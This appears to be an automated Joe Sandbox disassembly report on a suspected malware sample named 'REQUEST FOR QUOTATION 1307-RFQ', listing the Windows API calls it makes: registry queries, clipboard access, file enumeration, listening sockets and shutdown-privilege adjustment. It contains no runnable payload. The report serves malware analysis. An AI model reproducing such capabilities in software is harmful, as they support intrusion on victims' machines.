                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                                              • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                                                                                              • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1240663315-0
                                                                                                                                                                                                                              • Opcode ID: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                                                                                                                                                                                                                              • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8542518c0941377969b425a9142a02189ed0d51512cf45e3ee4068e3fae0101d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                                                                              • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                                                                                                                                                              • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F484
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0046F49F
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                              • API String ID: 713712311-438819550
                                                                                                                                                                                                                              • Opcode ID: 0fb37ddf953590d706fb9364c28091077e68f31a8b68d00aa4a0a6f7ff02baf6
                                                                                                                                                                                                                              • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fb37ddf953590d706fb9364c28091077e68f31a8b68d00aa4a0a6f7ff02baf6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __itow__swprintf
                                                                                                                                                                                                                              • String ID: 3cA$_A
                                                                                                                                                                                                                              • API String ID: 674341424-3480954128
                                                                                                                                                                                                                              • Opcode ID: c4747638c70455469c94f3d851c01ebbddfe3e95b9fa5bb9feb2d89a944fcb44
                                                                                                                                                                                                                              • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4747638c70455469c94f3d851c01ebbddfe3e95b9fa5bb9feb2d89a944fcb44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                                                                                                • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                                                                                                • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                                                                              • API String ID: 2234035333-194228
                                                                                                                                                                                                                              • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                                                                                                                                                              • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                                                                                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                                                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279440585-0
                                                                                                                                                                                                                              • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                                                                                                                                                              • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00450258
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0045036D
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00450414
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1300846289-0
                                                                                                                                                                                                                              • Opcode ID: abb8a364f6375cf7ed3c27617171bcc33c0b941e786a2993e93d25adad6f172b
                                                                                                                                                                                                                              • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb8a364f6375cf7ed3c27617171bcc33c0b941e786a2993e93d25adad6f172b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                                                                                                                                                                • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ColorProc$LongWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3744519093-0
                                                                                                                                                                                                                              • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                                                                                              • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 99427753-0
                                                                                                                                                                                                                              • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                                                                                                                                                                                              • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 292994002-0
                                                                                                                                                                                                                              • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                                                                                              • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                                                                              • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                                                                                              • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
